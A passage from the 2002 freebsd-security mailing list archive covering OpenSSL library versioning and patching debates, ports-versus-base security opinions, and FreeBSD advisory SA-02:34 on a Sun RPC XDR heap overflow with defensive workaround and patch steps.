vulnerable, but unless you have ssh statically linked then updating > > > your openssl version will fix any problems. > > > > > > > Hi Simon, > > > > I think this is only true if your version of ssh/sshd was already > > built with a recent version of OpenSSL (libcrypto.so.3). If your > > ssh uses libcrypto.so.2, updating OpenSSL to 0.9.6e would still > > leave your ssh vulnerable (same applies to any other build using > > OpenSSL) > > > > Thomas > > > > BTW: which version of OpenSSL bumped so.2 -> so.3 ? > > > > > > > Hi, > > What is the exact problem that affects OpenSSH by means of being > linked with libcrypto ? Does it use any SSL mechanisms that were > reported to be vulnerable ? > > PS: the (just released) FreeBSD adivory on OpenSSL vulnerabilitues > doesn't mention the SSH binaries as being affected by the problems. > > Thank you, > Ady (@freebsd.ady.ro) I can't tell whether OpenSSH is vulnerable or not. I just wanted to point out that it would not be sufficient to just install the corrected libs as there may be apps still using the older ones. Sorry for the misunderstanding. Thomas To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 19:23:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6300F37B401 for ; Wed, 31 Jul 2002 19:23:49 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7896D43E72 for ; Wed, 31 Jul 2002 19:23:48 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id DA36354; Wed, 31 Jul 2002 21:23:47 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g712NlU4020272; Wed, 31 Jul 2002 21:23:47 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g712NlF0020271; Wed, 31 Jul 2002 21:23:47 -0500 (CDT) Date: Wed, 31 Jul 2002 21:23:47 -0500 From: "Jacques A. Vidrine" To: Dirk Meyer Cc: freebsd-security@FreeBSD.ORG Subject: Re: Are OpenSSL bugs related to OpenSSH ? Message-ID: <20020801022347.GA20191@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Dirk Meyer , freebsd-security@FreeBSD.ORG References: <1028113366.1406.0.camel@linux> <200207311127.g6VBRWY98818@www.wsf.at> <20020731151607.GD26793@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: X-Url: http://www.nectar.cc/ User-Agent: Mutt/1.5.1i-ja.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jul 31, 2002 at 09:43:34PM +0200, Dirk Meyer wrote: > It is not fully configures fault, as I found now way to tell ld > to link with the desired libssl.so it the nubers are equal. > As the port version is newer or equal the version in the base, > linking with libssl.so from the ports is desired. > So if no port is installed everything compiles and links with > the base version, and when the port is installed each port can > link against it. I believe that ports that are not picking up libraries in ${LOCALBASE}/lib before they pick up those in /usr/lib are broken. Generally, `configure' scripts will honor LIBS when looking for libraries ... and generally ports should include $LOCALBASE in libs if they are expected to use libraries that are not in the base system. > The version BUMP makes this clear, even if the API is the same. > Otherwise we have to hack about 200 ports to select. I personally believe this is a very poor reason to bump the library version. I'll go so far as to call it bogus. :-) Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 19:25:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3790E37B400 for ; Wed, 31 Jul 2002 19:25:41 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9C5CE43EB1 for ; Wed, 31 Jul 2002 19:25:37 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 0CA4054; Wed, 31 Jul 2002 21:25:32 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g712PVU4020290; Wed, 31 Jul 2002 21:25:31 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g712PVvR020289; Wed, 31 Jul 2002 21:25:31 -0500 (CDT) Date: Wed, 31 Jul 2002 21:25:31 -0500 From: "Jacques A. Vidrine" To: Christopher Schulte Cc: Dirk Meyer , freebsd-security@FreeBSD.ORG Subject: Re: Are OpenSSL bugs related to OpenSSH ? Message-ID: <20020801022531.GB20191@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Christopher Schulte , Dirk Meyer , freebsd-security@FreeBSD.ORG References: <1028113366.1406.0.camel@linux> <200207311127.g6VBRWY98818@www.wsf.at> <20020731151607.GD26793@madman.nectar.cc> <5.1.1.6.2.20020731153229.03e9f388@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <5.1.1.6.2.20020731153229.03e9f388@localhost> X-Url: http://www.nectar.cc/ User-Agent: Mutt/1.5.1i-ja.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jul 31, 2002 at 03:44:11PM -0500, Christopher Schulte wrote: > I installed the 0.9.6e openssl port to overwrite base > (-DOPENSSL_OVERWRITE_BASE) > and relinked my critical apps. I added: > > NO_OPENSSL= true > > to /etc/make.conf > > Now when I want to update to a patched RELENG_4_6, and use the base openssl, > should I: > > 1) deinstall the port > 2) remove make.conf declaration > 3) cvsup/make world > 4) recompile my third party apps again, because /usr/lib/libcrypto.so.3 and > /usr/lib/libssl.so.3 are not used by the base openssl That's correct. > I'm only a tad confused with number 4. Was the .2 -> .3 change made just > within > the port or within openssl itself? Thanks! Just within the port. It was ill-advised (IMO). If it weren't for the gratuitous version bump, you wouldn't have to rebuild your apps yet again. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 19:46:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DAC2937B405; Wed, 31 Jul 2002 19:46:07 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0A4FA43E6A; Wed, 31 Jul 2002 19:46:07 -0700 (PDT) (envelope-from security-advisories@freebsd.org) Received: from freefall.freebsd.org (nectar@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g712k6JU003347; Wed, 31 Jul 2002 19:46:06 -0700 (PDT) (envelope-from security-advisories@freebsd.org) Received: (from nectar@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g712k6IN003346; Wed, 31 Jul 2002 19:46:06 -0700 (PDT) Date: Wed, 31 Jul 2002 19:46:06 -0700 (PDT) Message-Id: <200208010246.g712k6IN003346@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: nectar set sender to security-advisories@freebsd.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-02:34.rpc Reply-To: security-advisories@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-02:34.rpc Security Advisory The FreeBSD Project Topic: Sun RPC XDR decoder contains buffer overflow Category: core Module: libc Announced: 2002-07-31 Credits: ISS X-Force Affects: All releases of FreeBSD up to and including 4.6.1-RELEASE-p3 Corrected: 2002-07-31 14:45:29 UTC (RELENG_4) 2002-07-31 14:47:02 UTC (RELENG_4_6) 2002-07-31 14:49:18 UTC (RELENG_4_5) 2002-07-31 14:50:18 UTC (RELENG_4_4) FreeBSD only: NO I. Background Sun RPC is a remote procedure call framework which allows clients to invoke procedures in a server process over a network somewhat transparently. XDR is a mechanism for encoding data structures for use with RPC. NFS, NIS, and many other network services are built upon Sun RPC. The FreeBSD C runtime library (libc) contains an XDR encoder/decoder derived from Sun's RPC implementation. II. Problem Description An error in the calculation of memory needed for unpacking arrays in the XDR decoder can result in a heap buffer overflow. III. Impact Any application using Sun RPC may be vulnerable to the heap buffer overflow. Depending upon the application, this vulnerability may be exploitable and lead to arbitrary code execution. Though no exploits are known to exist currently, many RPC-based services run as the superuser (such as NFS, the NIS server, rpc.statd, and others) and thus this vulnerability should be considered high-risk. No RPC-based services are enabled by default in FreeBSD installations. IV. Workaround Do not run any RPC-based services. The RPC-based services running on a machine may be determined by: # rpcinfo -p To disable any RPC-based services at next boot, add (or change if it is already present) the following lines in /etc/rc.conf: portmap_enable="NO" nfs_client_enable="NO" nfs_server_enable="NO" nis_client_enable="NO" nis_server_enable="NO" V. Solution Do one of the following: 1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated after the correction date (4.6.1-RELEASE-p4, 4.5-RELEASE-p12, or 4.4-RELEASE-p19). 2) To patch your present system: The following patch has been verified to apply to FreeBSD 4.4, 4.5, and 4.6 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:34/rpc.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:34/rpc.patch.asc b) Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system as described in . Note that any statically linked applications that are not part of the base system (i.e. from the Ports Collection or other 3rd-party sources) must be recompiled if they use Sun RPC. All affected applications must be restarted in order to use the corrected library. Though it is not required, rebooting may be the easiest way to accomplish this. VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. Path Revision Branch - ------------------------------------------------------------------------- src/lib/libc/xdr/xdr_array.c RELENG_4 1.8.2.2 RELENG_4_6 1.8.10.2 RELENG_4_5 1.8.8.2 RELENG_4_4 1.8.6.2 src/sys/conf/newvers.sh RELENG_4_6 1.44.2.23.2.9 RELENG_4_5 1.44.2.20.2.13 RELENG_4_4 1.44.2.17.2.18 - ------------------------------------------------------------------------- VII. References -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iQCVAwUBPUigCVUuHi5z0oilAQHdiAP8CcsDW7DufF7wYg0FcgoyQ2ugiBe21lgo YfAGfRcfxPtoZcmMApK3I5jUd/MRWCxBT3+ZcwtKe/aNH4hFlcpfcH5WYLVlrCgH 5QuVRR8dUfF/cWr8ejPq6xjXysUd/jMZWRQjAV8pCr+ngGSeMUeXQshB71ZyA5nk YrBUd7Uoenk= =lwhC -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 20:24:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E117437B401 for ; Wed, 31 Jul 2002 20:24:21 -0700 (PDT) Received: from blade-runner.mit.edu (BLADE-RUNNER.MIT.EDU [18.78.0.22]) by mx1.FreeBSD.org (Postfix) with ESMTP id F384D4432E for ; Wed, 31 Jul 2002 20:09:26 -0700 (PDT) (envelope-from petr@blade-runner.mit.edu) Received: from blade-runner.mit.edu (localhost [127.0.0.1]) by blade-runner.mit.edu (8.12.5/8.12.5) with ESMTP id g7130ljj005269; Wed, 31 Jul 2002 23:00:47 -0400 (EDT) (envelope-from petr@blade-runner.mit.edu) Received: (from petr@localhost) by blade-runner.mit.edu (8.12.5/8.12.5/Submit) id g7130laU005266; Wed, 31 Jul 2002 23:00:47 -0400 (EDT) To: "Michael Sharp" Cc: , Subject: Re: About the openssl hole References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor> <2115515250.20020730190434@buz.ch> <3D470873.5C42BF65@pantherdragon.org> <3D47402F.83B37CBA@pantherdragon.org> <2319.192.168.1.4.1028151129.squirrel@webmail.probsd.ws> From: Petr Swedock Date: 31 Jul 2002 23:00:46 -0400 In-Reply-To: <2319.192.168.1.4.1028151129.squirrel@webmail.probsd.ws> Message-ID: <86y9brnuzl.fsf@blade-runner.mit.edu> Lines: 33 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Michael Sharp" writes: > Regarding using a port to fix a core issue. I so toatally disagree. I don't follow your reasoning. I didn't know openssl was a 'core' issue. > Each port/package that is installed on a FreeBSD box degrades the security > profile in small increments. How so? I don't follow. > My thoughts, use core as much as you can, > and use ports sparingly. I had 4 services exposed to the net that relied > on the bad OpenSSL. I chose to wait out the core team to fix things. Yes, > my website might have been down for 8 hrs, mail as well.. etc... but so > what? Downtime is a luxury few have. A luxury I certainly don't enjoy. > However, I'm not a 1000 hit a day business either so I guess one > could argue the wait for core/install a port issue there. But I have found > that core typically goes right to work on a issue, and a fix is out within > hrs. I don't see why installing the openssh ports isn't a fix. Peace, Petr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 21: 3:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B11AD37B400 for ; Wed, 31 Jul 2002 21:03:13 -0700 (PDT) Received: from probsd.ws (ilm26-7-034.ec.rr.com [66.26.7.34]) by mx1.FreeBSD.org (Postfix) with ESMTP id C347143E65 for ; Wed, 31 Jul 2002 21:03:11 -0700 (PDT) (envelope-from freebsd@ec.rr.com) Received: from probsd.ws (probsd.ws [192.168.1.4]) by probsd.ws (Postfix) with SMTP id BABE4146AA; Thu, 1 Aug 2002 00:05:57 -0400 (EDT) Message-ID: <1861.192.168.1.4.1028174757.squirrel@webmail.probsd.ws> Date: Thu, 1 Aug 2002 00:05:57 -0400 (EDT) Subject: Re: About the openssl hole From: "Michael Sharp" To: In-Reply-To: <86y9brnuzl.fsf@blade-runner.mit.edu> References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor> <2115515250.20020730190434@buz.ch> <3D470873.5C42BF65@pantherdragon.org> <3D47402F.83B37CBA@pantherdragon.org> <2319.192.168.1.4.1028151129.squirrel@webmail.probsd.ws> <86y9brnuzl.fsf@blade-runner.mit.edu> X-Priority: 3 Importance: Normal X-MSMail-Priority: Normal Cc: X-Mailer: SquirrelMail (version 1.2.7) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-2 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org RE: I don't follow your reasoning. I didn't know openssl was a 'core' issue I didnt say openssl is a core issue. I said installing a 3rd party openssl port that the FreeBSD hasnt audited as closely as it would the core openssl * sometimes * is not a good idea. Unless! Your server cant afford downtime ( ie its a business ), then using the port * UNTIL * core is fixed makes sence. But installing a port * permanetly * because you cant wait x number of hrs until core is patched IMHO is not a good idea. RE: me: Each port/package that is installed on a FreeBSD box degrades the security profile in small increments. you: How so? I don't follow. Whats more secure, a core ONLY FreeBSD box, or a FreeBSD box with 20+ 3rd party ports installed? RE: Downtime is a luxury few have. A luxury I certainly don't enjoy. See my first statement... Unless! ... RE: I don't see why installing the openssh ports isn't a fix. From the FreeBSD Website.. " While the port maintainers make every reasonable effort to ensure that ports are safe... they DO NOT go thru the same stringent security audits that FreeBSD core does. " Maybe I'm missing something, but installing a port to apply a fix to a broken core issue IMHO isnt good, unless ... as in what we just saw with openssl... core is vulnerable, and the port isnt... installing the port until core is fixed makes since. Michael > "Michael Sharp" writes: > >> Regarding using a port to fix a core issue. I so toatally disagree. > > I don't follow your reasoning. I didn't know openssl was a 'core' > issue. > >> Each port/package that is installed on a FreeBSD box degrades the >> security profile in small increments. > > How so? I don't follow. > >> My thoughts, use core as much as you can, >> and use ports sparingly. I had 4 services exposed to the net that >> relied on the bad OpenSSL. I chose to wait out the core team to fix >> things. Yes, my website might have been down for 8 hrs, mail as well.. >> etc... but so what? > > Downtime is a luxury few have. A luxury I certainly don't enjoy. > >> However, I'm not a 1000 hit a day business either so I guess one could >> argue the wait for core/install a port issue there. But I have found >> that core typically goes right to work on a issue, and a fix is out >> within hrs. > > I don't see why installing the openssh ports isn't a fix. > > Peace, > > Petr > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 21:38:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4DC4537B400 for ; Wed, 31 Jul 2002 21:38:49 -0700 (PDT) Received: from www.cotse.net (www.cotse.net [216.112.42.60]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3046A43E42 for ; Wed, 31 Jul 2002 21:38:48 -0700 (PDT) (envelope-from colonel_flagg@internetwarzone.org) Received: from www.cotse.net (www.cotse.net[216.112.42.60]) (authenticated bits=0) by www.cotse.net (8.12.5/8.12.5) with ESMTP id g714c7Sr086078 for ; Thu, 1 Aug 2002 00:38:08 -0400 (EDT) (envelope-from colonel_flagg@internetwarzone.org) Message-Id: <5.1.0.14.2.20020801003255.0348b558@none.nowhere.org> X-Sender: warzone@pop.cotse.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Thu, 01 Aug 2002 00:38:46 -0400 To: freebsd-security@freebsd.org From: "Colonel Sam Flagg, U.S. Army Intelligence (ret)" Subject: openssl workaround? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm sure this was covered, but I've just joined the group, so if someone would copy/paste the answer or whatever, I would be grateful. In the recent openssl advisory, we're told that a workaround is possible... Topic: openssl contains multiple vulnerabilities IV. Workaround Disabling the SSL2 protocol in server applications should render server exploits harmless. There is no known workaround for client applications. My question is, if we must wait to make world, what's the best way to disable SSL2? /CF To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 22:25: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7B6D037B400 for ; Wed, 31 Jul 2002 22:25:06 -0700 (PDT) Received: from blade-runner.mit.edu (BLADE-RUNNER.MIT.EDU [18.78.0.22]) by mx1.FreeBSD.org (Postfix) with ESMTP id B763643E6E for ; Wed, 31 Jul 2002 22:25:05 -0700 (PDT) (envelope-from petr@blade-runner.mit.edu) Received: from blade-runner.mit.edu (localhost [127.0.0.1]) by blade-runner.mit.edu (8.12.5/8.12.5) with ESMTP id g715P8jj006056; Thu, 1 Aug 2002 01:25:08 -0400 (EDT) (envelope-from petr@blade-runner.mit.edu) Received: (from petr@localhost) by blade-runner.mit.edu (8.12.5/8.12.5/Submit) id g715P8sl006053; Thu, 1 Aug 2002 01:25:08 -0400 (EDT) To: "Michael Sharp" Cc: Subject: Re: About the openssl hole References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor> <2115515250.20020730190434@buz.ch> <3D470873.5C42BF65@pantherdragon.org> <3D47402F.83B37CBA@pantherdragon.org> <2319.192.168.1.4.1028151129.squirrel@webmail.probsd.ws> <86y9brnuzl.fsf@blade-runner.mit.edu> <1861.192.168.1.4.1028174757.squirrel@webmail.probsd.ws> From: Petr Swedock Date: 01 Aug 2002 01:25:08 -0400 In-Reply-To: <1861.192.168.1.4.1028174757.squirrel@webmail.probsd.ws> Message-ID: <86sn1znoaz.fsf@blade-runner.mit.edu> Lines: 59 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Michael Sharp" writes: > RE: I don't follow your reasoning. I didn't know openssl was a 'core' issue > > I didnt say openssl is a core issue. I'm not going to quibble, but you did say "Regarding using a port to fix a core issue." ^^^^^^^^^^^^^ I don't point this out to flame, or score points, but only to ensure we're talking the same language. > I said installing a 3rd party openssl > port that the FreeBSD hasnt audited as closely as it would the core > openssl * sometimes * is not a good idea. Unless! Your server cant afford > downtime ( ie its a business ), then using the port * UNTIL * core is > fixed makes sence. But installing a port * permanetly * because you cant > wait x number of hrs until core is patched IMHO is not a good idea. Unless *I'm* able to audit the code to my satisfaction. One of the things I like about FreeBSD, and one of the reasons I use it wherever I'm able, is the ports collection. Specifically the fact that it doesn't just import and install binaries but compiles (usually w/out difficulty =-) under my supervision. So in this case, I have the distinfo checksum, the source code & whatever code audit I may do, the make and/or compiler warnings and the good industry of the ports maintainer. I'm satisfied in that security. I think it's a good system. > RE: > me: Each port/package that is installed on a FreeBSD box degrades the > security profile in small increments. > you: How so? I don't follow. > > Whats more secure, a core ONLY FreeBSD box, or a FreeBSD box with 20+ 3rd > party ports installed? I think that's not a good comparison. If you simply pound the keyboard deriving 'cd /usr/ports/fu;make build; make install' and walk away... I'll agree, that's insecure. If you install a core only FreeBSD box and walk away leaving only the defaults... that too, is insecure. Again, the big win with the ports collection is the ability to supervise the compile and install (without having to build a new Makefile for each port) and follow up on concerns. Sure it's a lot of work, but so is re-installing. Also maintaining a certain level of vigilance is, IMHO, much less stressful than doing a short-notice re- install of a server under the baleful eye of users desperate to get back to work. Been there. Done that. Peace, Petr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 23:49:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 14FE937B400 for ; Wed, 31 Jul 2002 23:49:30 -0700 (PDT) Received: from mail.renet.ru (ns.renet.ru [195.161.130.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5DCF643E77 for ; Wed, 31 Jul 2002 23:49:28 -0700 (PDT) (envelope-from admin@veksha.renet.ru) Received: from unspecified.host (veksha.renet.ru [195.161.131.73]) by mail.renet.ru (8.12.4/8.12.4) with SMTP id g716pi3E046341 for ; Thu, 1 Aug 2002 10:51:44 +0400 (MSD) Received: from 192.168.2.1 ([192.168.2.1]) by 192.168.2.1 (WinRoute Pro 4.1) with SMTP; Thu, 1 Aug 2002 10:51:44 +0400 Date: Thu, 1 Aug 2002 10:51:44 +0400 From: "Mikhail A. Khadanovich" X-Mailer: The Bat! (v1.53d) Reply-To: admin Organization: Veksha X-Priority: 3 (Normal) Message-ID: <472065340552.20020801105144@veksha.renet.ru> To: security@freebsd.org Subject: unsubscribe: 'security@freebsd.org' is not a member of list 'freebsd-security'. MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org unsubscribe freebsd-security To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 23:51:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7395537B400 for ; Wed, 31 Jul 2002 23:51:39 -0700 (PDT) Received: from mail.renet.ru (ns.renet.ru [195.161.130.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6F63543E88 for ; Wed, 31 Jul 2002 23:50:25 -0700 (PDT) (envelope-from admin@veksha.renet.ru) Received: from unspecified.host (veksha.renet.ru [195.161.131.73]) by mail.renet.ru (8.12.4/8.12.4) with SMTP id g716qU3E046408 for ; Thu, 1 Aug 2002 10:52:31 +0400 (MSD) Received: from 192.168.2.1 ([192.168.2.1]) by 192.168.2.1 (WinRoute Pro 4.1) with SMTP; Thu, 1 Aug 2002 10:52:31 +0400 Date: Thu, 1 Aug 2002 10:52:31 +0400 From: "Mikhail A. Khadanovich" X-Mailer: The Bat! (v1.53d) Reply-To: admin Organization: Veksha X-Priority: 3 (Normal) Message-ID: <972065387410.20020801105231@veksha.renet.ru> To: security@freebsd.org Subject: unsubscribe: 'security@freebsd.org' is not a member of list 'freebsd-security'. MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org unsubscribe freebsd-security To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 23:55:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3DDA837B400 for ; Wed, 31 Jul 2002 23:55:52 -0700 (PDT) Received: from boleskine.patpro.net (boleskine.patpro.net [62.4.20.155]) by mx1.FreeBSD.org (Postfix) with ESMTP id D97FB43E4A for ; Wed, 31 Jul 2002 23:55:50 -0700 (PDT) (envelope-from patpro@patpro.net) Received: from localhost (cassandre [192.168.0.1]) by boleskine.patpro.net (8.11.3/8.11.3) with ESMTP id g716tnR87432 for ; Thu, 1 Aug 2002 08:55:50 +0200 (CEST) (envelope-from patpro@patpro.net) Date: Thu, 1 Aug 2002 08:55:44 +0200 Subject: Re: About the openssl hole Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v482) From: patpro To: freebsd-security@freebsd.org Content-Transfer-Encoding: 7bit In-Reply-To: <3D47402F.83B37CBA@pantherdragon.org> Message-Id: X-Mailer: Apple Mail (2.482) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I currently have a FreeBSD server and provide services like apache/ssl, pop/ ssl, smtp/ssl... I don't have physical access to the box. If I just : - update openSSL port - recompile every port that use openSSL (openSSH, Apache+mod_ssl, ....) will I be safe from remote attack ? Is the make-world compulsory to guaranty security from outside the box, or is it just the way to guaranty the security from both inside and outside ? I'm not paranoid about local exploit, only 2 people have a shell on the box and they also have the root passwd (my partners). A remote make-world is not a manipulation I whould be happy to do :/ thanks, patpro To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 0:35:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CF2D937B400 for ; Thu, 1 Aug 2002 00:35:20 -0700 (PDT) Received: from topaz.mdcc.cx (topaz.mdcc.cx [212.204.230.141]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6CA7343E6A for ; Thu, 1 Aug 2002 00:35:20 -0700 (PDT) (envelope-from edwin@mavetju.org) Received: from k7.mavetju (topaz.mdcc.cx [212.204.230.141]) by topaz.mdcc.cx (Postfix) with ESMTP id 8367B2B8D6 for ; Thu, 1 Aug 2002 09:35:17 +0200 (CEST) Received: by k7.mavetju (Postfix, from userid 1001) id 